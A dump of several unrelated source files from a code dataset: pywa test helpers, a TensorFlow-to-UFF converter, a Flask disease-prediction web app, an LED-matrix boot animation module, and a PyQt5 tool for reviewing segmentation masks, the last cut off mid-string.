caption=\"Caption\")\n\n\ndef modify_img_mime_type(msg: Message, mime_type: str):\n return dataclasses.replace(\n msg, image=dataclasses.replace(msg.image, mime_type=mime_type)\n )\n\n\ndef modify_reaction(msg: Message, emoji: str | None):\n return dataclasses.replace(\n msg, reaction=dataclasses.replace(msg.reaction, emoji=emoji)\n )\n\n\ndef modify_location(msg: Message, lat: float, lon: float):\n return dataclasses.replace(\n msg, location=dataclasses.replace(msg.location, latitude=lat, longitude=lon)\n )\n\n\ndef modify_contact_phone(msg: Message, phone: str):\n return dataclasses.replace(\n msg,\n contacts=(\n dataclasses.replace(\n msg.contacts[0],\n phones=[dataclasses.replace(msg.contacts[0].phones[0], phone=phone)],\n ),\n ),\n )\n\n\ndef add_wa_number_to_contact(msg: Message):\n return dataclasses.replace(\n msg,\n contacts=(\n dataclasses.replace(\n msg.contacts[0],\n phones=[\n dataclasses.replace(msg.contacts[0].phones[0], wa_id=\"123456789\")\n ],\n ),\n ),\n )\n\n\ndef keep_only_one_contact(msg: Message):\n return dataclasses.replace(msg, contacts=msg.contacts[:1])\n\n\ndef modify_order_price(msg: Message, price: int, quantity: int):\n return dataclasses.replace(\n msg,\n order=dataclasses.replace(\n msg.order,\n products=[\n dataclasses.replace(\n msg.order.products[0], price=price, quantity=quantity\n )\n ],\n ),\n )\n\n\ndef modify_order_products_count(msg: Message, count: int):\n return dataclasses.replace(\n msg,\n order=dataclasses.replace(\n msg.order,\n products=[msg.order.products[0] for _ in range(count)],\n ),\n )\n\n\ndef modify_order_product_sku(msg: Message, sku: str):\n return dataclasses.replace(\n msg,\n order=dataclasses.replace(\n msg.order,\n products=[dataclasses.replace(msg.order.products[0], sku=sku)],\n ),\n )\n\n\ndef modify_callback_data(clb: CallbackButton | CallbackSelection, data: str):\n return dataclasses.replace(clb, data=data)\n\n\ndef modify_status_err(status: MessageStatus, err: WhatsAppError):\n return dataclasses.replace(status, error=err)\n","repo_name":"david-lev/pywa","sub_path":"tests/test_filters.py","file_name":"test_filters.py","file_ext":"py","file_size_in_byte":10861,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"37"} +{"seq_id":"11711061237","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport tensorflow as tf\nimport uff\nfrom tensorflow.python.tools import freeze_graph\n\n\ndef load_graph(frozen_graph):\n \"\"\"Load the model from file into GraphDef/Graph object\n\n Args:\n frozen_graph: The serialization of GraphDef model in the file like *.pbtxt or *.pb\n\n Returns:\n None\n \"\"\"\n\n with tf.gfile.GFile(frozen_graph, \"rb\") as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n\n # with on prefix name\n with tf.Graph().as_default() as graph:\n tf.import_graph_def(graph_def, name=\"\")\n return graph\n\n\ndef write_model_graph(sess, dest_path='/tmp', output_model_graph_name='model_graph.pbtxt'):\n \"\"\"Write the model's GraphDef into file\n\n This model file doesn't contain variables data.\n\n Args:\n sess: Session object\n dest_path: The destination path of the output UFF file\n output_model_graph_name: The name of output file\n\n Returns:\n None\n \"\"\"\n\n tf.train.write_graph(sess.graph, dest_path, output_model_graph_name)\n\n\ndef do_freeze_graph(input_graph_path, checkpoint_path, output_node_names_str, dest_path='/tmp',\n output_frozen_graph_name='frozen_graph.pb', input_binary=False):\n \"\"\" A wrapper function to use API:freeze_graph.freeze_graph() to generate frozen model file (*.pb).\n\n This function leverages API:freeze_graph.freeze_graph() and becomes more easy to use.\n The function doesn't conatins any optimization approach inside it.\n\n Args:\n input_graph_path: The serialization of GraphDef in file, such as *.pbtxt or *.pb\n checkpoint_path: The check-point path that contains variables data\n output_node_names_str: The output operation name list split by comma. \n for instance: \n \"fasterrcnn/rcnn/rcnn_proposal_1/GatherV2_161,\n fasterrcnn/rcnn/fc_bbox/add,fasterrcnn/rcnn/fc_classifier/add,\n fasterrcnn/rcnn/rcnn_proposal_1/TopKV2\"\n dest_path: The destination path of the output UFF file\n output_frozen_graph_name: The name of the frozen graph file\n input_binary: The graph from input_graph_path is binary format or not\n\n Returns:\n None\n \"\"\"\n\n input_saver_def_path = \"\"\n restore_op_name = \"\"\n filename_tensor_name = \"\"\n output_optimized_graph_name = \"\"\n clear_devices = True\n\n freeze_graph.freeze_graph(input_graph_path, input_saver_def_path,\n input_binary, checkpoint_path, output_node_names_str,\n restore_op_name, filename_tensor_name,\n os.path.join(dest_path, output_frozen_graph_name),\n clear_devices, \"\")\n\n\ndef convert_uff_from_tensorflow(sess, graph_def, model_output, dest_path='/tmp', dest_name='converted.uff'):\n \"\"\"Convert Session GraphDef from TensorFlow to UFF format model\n \n This function is for converting directly from TensorFlow's Session GraphDef and Session object. \n The session should be built with graph and the variables are also restored from check-point files already.\n\n Args:\n sess: Session object\n graph: GraphDef object is from either pbtxt file or Python's model source code \n dest_path: The destination path of the output UFF file\n dest_name: The name of the UFF file\n\n Returns:\n None\n \"\"\"\n frozen_graph = tf.graph_util.convert_variables_to_constants(sess, graph_def, model_output)\n frozen_graph = tf.graph_util.remove_training_nodes(frozen_graph)\n #Create UFF model and dump it on disk\n uff_model = uff.from_tensorflow(frozen_graph, model_output)\n dump = open(os.path.join(dest_path, dest_name), 'wb')\n dump.write(uff_model)\n dump.close()\n\n\ndef convert_uff_from_frozen_model(frozen_graph, model_output, dest_path='/tmp', dest_name='converted.uff'):\n \"\"\"Convert the frozen model file to UFF format model\n\n This function is for converting directly from frozen model file which is done by freeze_graph(). \n So this frozen file will contains the serialization of GraphDef and Variables data in const value.\n\n Args:\n frozen_graph: The frozen model file (*.pb)\n dest_path: The destination path of the output UFF file\n dest_name: The name of the UFF file\n\n Returns:\n None\n \"\"\"\n\n uff_model = uff.from_tensorflow_frozen_model(frozen_graph, model_output)\n dump = open(os.path.join(dest_path, dest_name), 'wb')\n dump.write(uff_model)\n dump.close()\n\n\n","repo_name":"myelintek/gui-project","sub_path":"code/myelindl/core/utils/uff_converter.py","file_name":"uff_converter.py","file_ext":"py","file_size_in_byte":4465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2400470895","text":"import joblib\nimport numpy as np\nimport pandas as pd\nfrom flask import Blueprint, render_template, request, redirect, url_for, flash\nfrom flask_login import current_user, login_required, login_user\nfrom flask_security import logout_user\nfrom werkzeug.security import check_password_hash\nfrom models.user import User\nfrom extensions import db, login_manager, bcrypt\nimport pickle\nimport numpy as np\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import train_test_split\nimport warnings\n\n# warnings.filterwarnings(\"ignore\")\n\nfilename = 'diabetes-prediction-rfc-model.pkl'\nclassifier = pickle.load(open(filename, 'rb'))\nmodel = pickle.load(open('model.pkl', 'rb'))\nmodel1 = pickle.load(open('model1.pkl', 'rb'))\nmain = Blueprint('main', __name__, static_folder='../static', template_folder='../templates')\n\n\ndef get_user(user_id):\n user = User.query.filter_by(id=user_id).first()\n return user\n\n\n@login_manager.user_loader\ndef load_user(user_id):\n return get_user(user_id)\n\n\n@main.route('/login')\ndef login():\n return render_template('security/login_user.html')\n\n\n@main.route('/sign-in', methods=['POST', 'GET'])\ndef login_post():\n email = request.form.get('email')\n password = request.form.get('password')\n # remember_me = True if request.form.get('remember') else False\n user = User.query.filter_by(email=email).first()\n if user and user.verify_password(password) and user.active==1:\n login_user(user)\n flash(f\"Hi {user.username}!\", \"success\")\n if user.roles[0].name.__eq__(\"patient\"):\n return redirect(url_for('patient.pat_dash'))\n if user.roles[0].name.__eq__(\"admin\"):\n return redirect(url_for('admin.admin_dash'))\n if user.roles[0].name.__eq__(\"doctor\"):\n return redirect(url_for('doctor.doc_dash'))\n else:\n flash(\"Error! Recreate your account, please\")\n return \"NO DEFINED ROLE\"\n\n flash(\"Invalid Password/ Email. Please Try Again!\")\n return render_template(\"security/login_user.html\")\n\n\n@main.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n\n@main.route('/about')\ndef about():\n return render_template(\"about.html\")\n\n\n@main.route('/help')\ndef help():\n return render_template(\"help.html\")\n\n\n@main.route('/terms')\ndef terms():\n return render_template(\"tc.html\")\n\n\n@main.route(\"/home\")\n@login_required\ndef home():\n return f\"{current_user.username}. Your email is {current_user.email}\"\n\n\n@main.errorhandler(404)\ndef page_not_found(e):\n # note that we set the 404 status explicitly\n return render_template('404.html'), 404\n\n\n@main.errorhandler(500)\ndef internal_server_error(e):\n # note that we set the 500 status explicitly\n return render_template('500.html'), 500\n\n\n@main.route(\"/add_phone_number\")\n@login_required\ndef add_phone():\n return render_template(\"/security/add_phone.html\")\n\n\n@main.route(\"/update_phone\", methods=[\"GET\", \"POST\"])\n@login_required\ndef update_phone():\n if request.method == \"POST\":\n phone_number = request.form[\"phone_number\"]\n # user = User.query.filter_by(email=current_user.email).first()\n user_updated = User.query.filter_by(id=current_user.id).update(dict(phone=phone_number))\n db.session.commit()\n return redirect(\"/home\")\n\n\n@main.route(\"/dashboard\")\n@login_required\ndef dashboard():\n return render_template(\"diseases/dashboard.html\")\n\n\n@main.route(\"/disindex\")\ndef disindex():\n return render_template(\"diseases/disindex.html\")\n\n\n@main.route(\"/cancer\")\n@login_required\ndef cancer():\n return render_template(\"diseases/cancer.html\")\n\n\n@main.route(\"/diabetes\")\n@login_required\ndef diabetes():\n return render_template(\"diseases/diabetes.html\")\n\n\n@main.route(\"/heart\")\n@login_required\ndef heart():\n return render_template(\"diseases/heart.html\")\n\n\n@main.route(\"/kidney\")\n@login_required\ndef kidney():\n return render_template(\"diseases/kidney.html\")\n\n\ndef ValuePredictor(to_predict_list, size):\n to_predict = np.array(to_predict_list).reshape(1, size)\n if size == 7:\n loaded_model = joblib.load('kidney_model.pkl')\n result = loaded_model.predict(to_predict)\n return result[0]\n\n\n@main.route(\"/predictkidney\", methods=['GET', 'POST'])\ndef predictkidney():\n if request.method == \"POST\":\n to_predict_list = request.form.to_dict()\n to_predict_list = list(to_predict_list.values())\n to_predict_list = list(map(float, to_predict_list))\n if len(to_predict_list) == 7:\n result = ValuePredictor(to_predict_list, 7)\n if (int(result) == 1):\n prediction = \"Patient has a high risk of Kidney Disease, please consult your doctor immediately\"\n else:\n prediction = \"Patient has a low risk of Kidney Disease\"\n return render_template(\"diseases/kidney_result.html\", prediction_text=prediction)\n\n\n@main.route(\"/liver\")\n@login_required\ndef liver():\n return render_template(\"diseases/liver.html\")\n\n\ndef ValuePred(to_predict_list, size):\n to_predict = np.array(to_predict_list).reshape(1, size)\n if (size == 7):\n loaded_model = joblib.load('liver_model.pkl')\n result = loaded_model.predict(to_predict)\n return result[0]\n\n\n@main.route('/predictliver', methods=[\"POST\"])\ndef predictliver():\n if request.method == \"POST\":\n to_predict_list = request.form.to_dict()\n to_predict_list = list(to_predict_list.values())\n to_predict_list = list(map(float, to_predict_list))\n if len(to_predict_list) == 7:\n result = ValuePred(to_predict_list, 7)\n\n if int(result) == 1:\n prediction = \"Patient has a high risk of Liver Disease, please consult your doctor immediately\"\n else:\n prediction = \"Patient has a low risk of Kidney Disease\"\n return render_template(\"diseases/liver_result.html\", prediction_text=prediction)\n\n\n@main.route('/logout')\n@login_required\ndef logout():\n logout_user()\n return redirect(url_for(''))\n\n\n@main.route('/predict', methods=['POST'])\ndef predict():\n input_features = [int(x) for x in request.form.values()]\n features_value = [np.array(input_features)]\n features_name = ['clump_thickness', 'uniform_cell_size', 'uniform_cell_shape', 'marginal_adhesion',\n 'single_epithelial_size', 'bare_nuclei', 'bland_chromatin', 'normal_nucleoli', 'mitoses']\n df = pd.DataFrame(features_value, columns=features_name)\n output = model.predict(df)\n if output == 4:\n res_val = \"a high risk of Breast Cancer\"\n else:\n res_val = \"a low risk of Breast Cancer\"\n\n return render_template('diseases/cancer_result.html', prediction_text=f'Patient has {res_val}')\n\n\n##################################################################################\n\ndf1 = pd.read_csv('diabetes.csv')\n\n# Renaming DiabetesPedigreeFunction as DPF\ndf1 = df1.rename(columns={'DiabetesPedigreeFunction': 'DPF'})\n\n# Replacing the 0 values from ['Glucose','BloodPressure','SkinThickness','Insulin','BMI'] by NaN\ndf_copy = df1.copy(deep=True)\ndf_copy[['Glucose', 'BloodPressure', 'SkinThickness', 'Insulin', 'BMI']] = df_copy[['Glucose', 'BloodPressure',\n 'SkinThickness', 'Insulin',\n 'BMI']].replace(0, np.NaN)\n\n# Replacing NaN value by mean, median depending upon distribution\ndf_copy['Glucose'].fillna(df_copy['Glucose'].mean(), inplace=True)\ndf_copy['BloodPressure'].fillna(df_copy['BloodPressure'].mean(), inplace=True)\ndf_copy['SkinThickness'].fillna(df_copy['SkinThickness'].median(), inplace=True)\ndf_copy['Insulin'].fillna(df_copy['Insulin'].median(), inplace=True)\ndf_copy['BMI'].fillna(df_copy['BMI'].median(), inplace=True)\n\n# Model Building\n\nX = df1.drop(columns='Outcome')\ny = df1['Outcome']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.20, random_state=0)\n\n# Creating Random Forest Model\n\nclassifier = RandomForestClassifier(n_estimators=20)\nclassifier.fit(X_train, y_train)\n\n# Creating a pickle file for the classifier\nfilename = 'diabetes-prediction-rfc-model.pkl'\npickle.dump(classifier, open(filename, 'wb'))\n\n\n#####################################################################\n\n\n@main.route('/predictt', methods=['POST'])\ndef predictt():\n if request.method == 'POST':\n preg = request.form['pregnancies']\n glucose = request.form['glucose']\n bp = request.form['bloodpressure']\n st = request.form['skinthickness']\n insulin = request.form['insulin']\n bmi = request.form['bmi']\n dpf = request.form['dpf']\n age = request.form['age']\n\n data = np.array([[preg, glucose, bp, st, insulin, bmi, dpf, age]])\n my_prediction = classifier.predict(data)\n\n return render_template('diseases/diab_result.html', prediction=my_prediction)\n\n\n############################################################################################################\n\n@main.route('/predictheart', methods=['POST'])\ndef predictheart():\n input_features = [float(x) for x in request.form.values()]\n features_value = [np.array(input_features)]\n\n features_name = [\"age\", \"trestbps\", \"chol\", \"thalach\", \"oldpeak\", \"sex_0\",\n \" sex_1\", \"cp_0\", \"cp_1\", \"cp_2\", \"cp_3\", \" fbs_0\",\n \"restecg_0\", \"restecg_1\", \"restecg_2\", \"exang_0\", \"exang_1\",\n \"slope_0\", \"slope_1\", \"slope_2\", \"ca_0\", \"ca_1\", \"ca_2\", \"thal_1\",\n \"thal_2\", \"thal_3\"]\n\n df = pd.DataFrame(features_value, columns=features_name)\n output = model1.predict(df)\n\n if output == 1:\n res_val = \"a high risk of Heart Disease\"\n else:\n res_val = \"a low risk of Heart Disease\"\n\n return render_template('diseases/heart_result.html', prediction_text='Patient has {}'.format(res_val))\n","repo_name":"samuelfaindani/diesease-diagnosis","sub_path":"med-app/main/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":9857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73276972268","text":"import time\nfrom submodule import Submodule\nimport settings\nfrom rgbmatrix import graphics\nfrom PIL import Image, ImageSequence\n\n\nclass BootService(Submodule):\n\n def __init__(self, add_loop, rmv_loop, add_event):\n super().__init__(add_loop, rmv_loop, add_event)\n\n add_event(1, self.display_boot_animation)\n add_event(1, self.display_boot_info)\n\n def display_boot_animation(self, matrix):\n try:\n image = Image.open(settings.IMAGES_PATH + 'boot2.gif')\n except FileNotFoundError:\n print('Boot Animation not found')\n return\n\n for frame in range(0, image.n_frames):\n image.seek(frame)\n temp = image.copy()\n temp = temp.resize((64, 32))\n matrix.SetImage(temp.convert('RGB'), unsafe=False)\n\n time.sleep(0.025)\n\n matrix.Clear()\n\n def display_boot_info(self, matrix):\n swap = matrix.CreateFrameCanvas()\n\n fontBold = graphics.Font()\n fontBold.LoadFont(settings.FONT_PATH + \"6x13B.bdf\")\n font = graphics.Font()\n font.LoadFont(settings.FONT_PATH + \"5x8.bdf\")\n header_color = graphics.Color(0, 180, 20)\n text_color = graphics.Color(100, 0, 100)\n number_color = graphics.Color(100, 100, 100)\n\n graphics.DrawText(swap, fontBold, 5, fontBold.baseline - 2, header_color, \"Boot Info\")\n graphics.DrawText(swap, font, 1, font.baseline + 13, text_color, \"Modules:\")\n graphics.DrawText(swap, font, 54, font.baseline + 13, number_color, str(settings.LOADED_MODULES))\n graphics.DrawText(swap, font, 1, font.baseline + 22, text_color, \"Services:\")\n graphics.DrawText(swap, font, 54, font.baseline + 22, number_color, str(settings.RUNNING_SERVICES))\n\n matrix.SwapOnVSync(swap)\n\n time.sleep(5)\n\n","repo_name":"brokelyn/rpi-led-matrix-scheduler","sub_path":"submodules/boot.py","file_name":"boot.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"3433715941","text":"\"\"\"\nThis code is written by Ridvan Salih KUZU @DLR\nABOUT SCRIPT:\nThis script implements all user interface functionalities\n\n\"\"\"\nimport sys\nimport glob\nimport shutil\nimport json\nfrom PyQt5 import QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QMessageBox\nfrom ui.gui import Ui_MainWindow\nfrom PyQt5.QtCore import pyqtSlot\nimport threading\nimport albumentations as A\nfrom general.custom_data_generator import InstanceGenerator\nfrom PIL import Image\nimport numpy as np\nfrom tensorflow.keras.models import load_model\nimport tensorflow as tf\nfrom general.post_processing import threshold_mask, post_processing #,binary_opening_closing\nfrom PIL.ImageQt import ImageQt\nimport pandas as pd\nimport warnings\nwarnings.filterwarnings(\"ignore\", category=RuntimeWarning)\nimport logging\nimport os\nlogging.disable(logging.WARNING)\n\n\n\nclass MyForm(QtWidgets.QMainWindow):\n\n def __init__(self, parent=None):\n QtWidgets.QWidget.__init__(self, parent)\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n\n self.ui._button_input_dir.clicked.connect(self.push_input_on_click)\n self.ui._button_output_dir.clicked.connect(self.push_output_on_click)\n self.ui._button_model_dir.clicked.connect(self.push_model_on_click)\n self.ui._button_start.clicked.connect(self.push_start_on_click)\n\n self.ui._button_good.clicked.connect(self.push_good_on_click)\n self.ui._button_moderate.clicked.connect(self.push_moderate_on_click)\n self.ui._button_bad.clicked.connect(self.push_bad_on_click)\n self.ui._button_save.clicked.connect(self.save_on_click)\n self.ui._button_overwrite.clicked.connect(self.overwrite_on_click)\n\n self.ui._slider_smooth.sliderReleased.connect(self.slider_value_changed_event)\n self.ui._slider_remove_hole.sliderReleased.connect(self.slider_value_changed_event)\n\n self.ui._combo_box.activated.connect(self.combo_value_changed_event)\n\n self.ui._rb_contour_view.clicked.connect(self.predicted_display_changed_event)\n self.ui._rb_mask_view.clicked.connect(self.predicted_display_changed_event)\n\n self.log_path=os.path.dirname(os.path.realpath(__file__))+os.sep+'log.json'\n self.process_info = {}\n self.is_warm_up=False\n\n\n def init_at_warm_up(self):\n self.is_warm_up=True\n self._out_dir_dict = {}\n self._temp_input = None\n self._temp_mask_raw = None\n self._temp_mask_processed = None\n self._temp_overlap=None\n self._temp_contour_processed = None\n\n self._model = None\n\n self.GLOBAL_COUNTER = 0\n self.FILE_NUMBER = 0\n self.pd_input_table = pd.DataFrame(columns=[\"disp_file\",\"in_file\",\"temp_file\", \"mask_file\",\"contour_file\", \"dest_im_file\", \"dest_mask_file\",\"dest_contour_file\"])\n\n @pyqtSlot()\n def push_input_on_click(self):\n in_dir = QtWidgets.QFileDialog.getExistingDirectory(None, 'Select input folder including BMP images:', 'F:\\\\',QtWidgets.QFileDialog.ShowDirsOnly)\n self.ui._line_input_dir.setText(in_dir)\n\n @pyqtSlot()\n def predicted_display_changed_event(self):\n self.display_next()\n\n\n @pyqtSlot()\n def push_output_on_click(self):\n out_dir = QtWidgets.QFileDialog.getExistingDirectory(None, 'Select output folder for generated masks:', 'F:\\\\',QtWidgets.QFileDialog.ShowDirsOnly)\n self.ui._line_output_dir.setText(out_dir)\n\n @pyqtSlot()\n def push_model_on_click(self):\n model_dir = QtWidgets.QFileDialog.getExistingDirectory(None, 'Select Tensorflow model for predictions:', 'F:\\\\',QtWidgets.QFileDialog.ShowDirsOnly)\n self.ui._line_model_dir.setText(model_dir)\n\n @pyqtSlot()\n def push_start_on_click(self):\n threading.Thread(target=self.prepare_start()).start()\n\n\n @pyqtSlot()\n def push_good_on_click(self):\n self.evaluate_next('good')\n\n @pyqtSlot()\n def push_moderate_on_click(self):\n self.evaluate_next('moderate')\n\n @pyqtSlot()\n def push_bad_on_click(self):\n self.evaluate_next('bad')\n\n @pyqtSlot()\n def save_on_click(self):\n self.move_to_selected_folder(False)\n\n @pyqtSlot()\n def overwrite_on_click(self):\n self.move_to_selected_folder(True)\n\n @pyqtSlot()\n def slider_value_changed_event(self):\n try:\n post_processing(self._temp_input, self._temp_mask_raw, self._temp_overlap, self._temp_mask_processed, self._temp_contour_processed,\n self.ui._slider_remove_hole.value(), self.ui._slider_smooth.value())\n except Exception as e:\n print(e)\n self.display_next()\n\n @pyqtSlot()\n def combo_value_changed_event(self):\n try:\n self.GLOBAL_COUNTER = self.ui._combo_box.currentIndex() - 1\n self.evaluate_next()\n\n except Exception as e:\n print(e)\n self.display_next()\n\n\n\n def evaluate_next(self, evaluation=None):\n if not self.is_warm_up:\n message = \"Please Start Process First!!\"\n QMessageBox.warning(self, 'WARNING', message, QMessageBox.Ok)\n\n self.ui._slider_remove_hole.setValue(0)\n self.ui._slider_smooth.setValue(0)\n if evaluation is not None:\n self.assign_to_selected_folder(evaluation)\n self.update_progress()\n is_ongiong=self.predict_next()\n if is_ongiong: self.display_next()\n\n def prepare_start(self):\n print(\"\\n\\n\\nPREPARATION OF THE SYSTEM MAY TAKE SOME MINUTES ON CPU MACHINES..\\n\\n\\n\")\n self.warmup_system()\n self.predict_next()\n self.display_next()\n\n def warmup_system(self):\n self.init_at_warm_up()\n in_dir = os.path.abspath(self.ui._line_input_dir.text())\n if not os.path.exists(in_dir):\n message = \"Input Folder \\\"{}\\\" is NOT found!!\".format(in_dir)\n QMessageBox.warning(self, 'WARNING', message, QMessageBox.Ok)\n\n else:\n for idx, file in enumerate(glob.glob(in_dir + os.sep + \"*.bmp\")):\n self.pd_input_table.loc[idx] = [os.path.basename(file),file, None, None, None,None,None,None]\n self.ui._combo_box.addItem(os.path.basename(file))\n\n self.FILE_NUMBER = len(glob.glob(in_dir + os.sep + \"*.bmp\"))\n\n out_dir = os.path.abspath(self.ui._line_output_dir.text())\n if not os.path.exists(out_dir):\n message = \"The output folder is NOT found. \\nCan we create it for you?\"\n reply=QMessageBox.information(self, 'INFORMATION', message, QMessageBox.Yes, QMessageBox.No)\n if reply ==QMessageBox.Yes:\n try:\n os.makedirs(out_dir)\n except OSError as e:\n print(e)\n message = \"The output folder cannot be created. \\n Please check the application permissions.\"\n QMessageBox.warning(self, 'WARNING',message, QMessageBox.Ok)\n else:\n return\n\n self.create_subfolders()\n\n if self.FILE_NUMBER==0:\n message = \"The input folder is empty. \\nPlease select a folder including BMP images.\"\n QMessageBox.warning(self, 'WARNING', message, QMessageBox.Ok)\n else:\n try:\n self._model = load_model(os.path.abspath(self.ui._line_model_dir.text()),compile=False)\n except Exception as e:\n print(e)\n message = \"The model file is not found. \\nPlease select a folder including a TF model.\"\n QMessageBox.warning(self, 'WARNING', message, QMessageBox.Ok)\n\n def create_subfolders(self, overwrite=False):\n out_dir = self.ui._line_output_dir.text()\n out_dir = os.path.abspath(out_dir)\n\n try:\n self._out_dir_dict['good']={}\n self._out_dir_dict['moderate']={}\n self._out_dir_dict['bad'] = {}\n self._out_dir_dict['peak_detection'] = {}\n\n self._out_dir_dict['good']['image'] = out_dir + os.sep + 'good'+os.sep +'image'+os.sep\n self._out_dir_dict['good']['mask'] = out_dir + os.sep +'good'+ os.sep +'mask'+os.sep\n self._out_dir_dict['good']['contour'] = out_dir + os.sep + 'good' + os.sep + 'contour' + os.sep\n\n self._out_dir_dict['moderate']['image'] = out_dir + os.sep +'moderate'+ os.sep +'image'+os.sep\n self._out_dir_dict['moderate']['mask'] = out_dir + os.sep +'moderate'+ os.sep +'mask'+os.sep\n self._out_dir_dict['moderate']['contour'] = out_dir + os.sep + 'moderate' + os.sep + 'contour' + os.sep\n\n self._out_dir_dict['bad']['image'] = out_dir + os.sep +'bad'+ os.sep +'image'+os.sep\n self._out_dir_dict['bad'] ['mask']= out_dir + os.sep +'bad'+ os.sep +'mask'+os.sep\n self._out_dir_dict['bad']['contour'] = out_dir + os.sep + 'bad' + os.sep + 'contour' + os.sep\n\n self._out_dir_dict['peak_detection']['image'] = out_dir + os.sep +'peak_detection'+ os.sep +'image'+os.sep\n self._out_dir_dict['peak_detection']['mask'] = out_dir + os.sep +'peak_detection'+ os.sep +'mask'+os.sep\n self._out_dir_dict['peak_detection']['contour'] = out_dir + os.sep + 'peak_detection' + os.sep + 'contour' + os.sep\n\n self._out_dir_dict['peak_detection']['peak_detection'] = out_dir + os.sep +'peak_detection'+os.sep\n\n for key,subdir in self._out_dir_dict.items():\n for subsubdir in subdir.values():\n if not os.path.exists(subsubdir):\n os.makedirs(subsubdir)\n elif overwrite and key != 'peak_detection':\n shutil.rmtree(subsubdir)\n os.makedirs(subsubdir)\n\n except OSError as e:\n print(e)\n message = \"The output folder is protected. \\n Please check the application permissions.\"\n QMessageBox.warning(self, 'WARNING', message, QMessageBox.Ok)\n\n def predict_next(self):\n try:\n if self.GLOBAL_COUNTER < self.FILE_NUMBER:\n INPUT_SHAPE = [512, 512, 3]\n OUTPUT_SHAPE = [512, 512, 1]\n\n TEST_TRANSFORMATION = A.Compose([\n A.Resize(INPUT_SHAPE[0], INPUT_SHAPE[1]),\n A.Normalize(mean=0, std=0.5),\n ])\n\n in_file_name = self.pd_input_table.iloc[self.GLOBAL_COUNTER]['in_file']\n image, input_source, _ = next(InstanceGenerator(TEST_TRANSFORMATION, in_file_name).__iter__())\n\n\n\n pred_mask = self._model.predict(image).squeeze()\n pred_mask = threshold_mask(pred_mask)\n #pred_mask=binary_opening_closing(pred_mask)\n pred_mask=Image.fromarray((pred_mask * 255).astype(np.uint8))\n\n self._temp_input = self._out_dir_dict['peak_detection']['image'] + os.path.basename(input_source)\n self._temp_mask_raw = self._out_dir_dict['peak_detection']['mask'] + os.path.basename(input_source).replace('.bmp', '_raw_mask.bmp')\n self._temp_overlap = self._out_dir_dict['peak_detection']['mask'] + os.path.basename(input_source).replace('.bmp', '_overlap.bmp')\n self._temp_mask_processed = self._out_dir_dict['peak_detection']['mask'] + os.path.basename(input_source).replace('.bmp','_mask.bmp')\n self._temp_contour_processed = self._out_dir_dict['peak_detection']['contour'] + os.path.basename(input_source).replace('.bmp', '_contour.bmp')\n\n try:\n shutil.copy(input_source,self._temp_input)\n except shutil.SameFileError:\n pass\n pred_mask.save(self._temp_mask_raw)\n post_processing(self._temp_input, self._temp_mask_raw, self._temp_overlap, self._temp_mask_processed, self._temp_contour_processed,\n self.ui._slider_remove_hole.value(), self.ui._slider_smooth.value())\n return True\n else:\n\n self.GLOBAL_COUNTER = 0\n message = \"The process is complete. \\nYou can start another process.\"\n reply = QMessageBox.information(self, 'INFORMATION', message, QMessageBox.Ok)\n return False\n\n except Exception as e:\n print(e)\n message = \"An Error occured. \\n {}\".format(e.__str__())\n QMessageBox.critical(self, 'ERROR', message, QMessageBox.Ok)\n\n\n\n def display_next(self):\n try:\n if self.ui._rb_mask_view.isChecked():\n temp_predicted=self._temp_mask_processed\n elif self.ui._rb_contour_view.isChecked():\n temp_predicted = self._temp_contour_processed\n\n\n\n q_image = ImageQt(Image.open(self._temp_overlap)).copy()\n q_mask = ImageQt(Image.open(temp_predicted)).copy()\n\n pix = QtGui.QPixmap.fromImage(q_image)\n mix = QtGui.QPixmap.fromImage(q_mask)\n\n self.ui._label_input_image.setPixmap(pix)\n self.ui._label_input_image.adjustSize()\n self.ui._label_predicted_mask.setPixmap(mix)\n self.ui._label_predicted_mask.adjustSize()\n\n self.ui._label_input_name.setText(os.path.basename(self._temp_input))\n self.ui._label_mask_name.setText(os.path.basename(temp_predicted))\n except Exception as e:\n print(e)\n #message = \"An error occured. \\n {}\".format(e.__str__())\n #QMessageBox.critical(self, 'ERROR', message, QMessageBox.Ok)\n return\n\n def assign_to_selected_folder(self, selected_dir):\n try:\n self.pd_input_table.iloc[self.GLOBAL_COUNTER]['temp_file'] = self._temp_input\n self.pd_input_table.iloc[self.GLOBAL_COUNTER]['mask_file'] = self._temp_mask_processed\n self.pd_input_table.iloc[self.GLOBAL_COUNTER]['contour_file'] = self._temp_contour_processed\n self.pd_input_table.iloc[self.GLOBAL_COUNTER]['dest_im_file'] = self._out_dir_dict[selected_dir]['image'] + os.path.basename(self._temp_input)\n self.pd_input_table.iloc[self.GLOBAL_COUNTER]['dest_mask_file'] = self._out_dir_dict[selected_dir]['mask'] + os.path.basename(self._temp_mask_processed)\n self.pd_input_table.iloc[self.GLOBAL_COUNTER]['dest_contour_file'] = self._out_dir_dict[selected_dir]['contour'] + os.path.basename(self._temp_contour_processed)\n except Exception as e:\n print(e)\n # message = \"An Error occured. \\n {}\".format(e.__str__())\n # QMessageBox.critical(self, 'ERROR', message, QMessageBox.Ok)\n return\n\n def move_to_selected_folder(self, overwrite):\n try:\n if not self.is_warm_up:\n message = \"Please Start the Process First!!\"\n QMessageBox.warning(self, 'WARNING', message, QMessageBox.Ok)\n\n if overwrite:\n self.create_subfolders(overwrite=True)\n for idx, row_items in self.pd_input_table.iterrows():\n if row_items['dest_im_file'] is not None:\n try:\n shutil.copy(row_items['temp_file'], row_items['dest_im_file'])\n except shutil.SameFileError:\n pass\n try:\n shutil.copy(row_items['mask_file'], row_items['dest_mask_file'])\n except shutil.SameFileError:\n pass\n try:\n shutil.copy(row_items['contour_file'], row_items['dest_contour_file'])\n except shutil.SameFileError:\n pass\n\n message = \"The evaluated files are 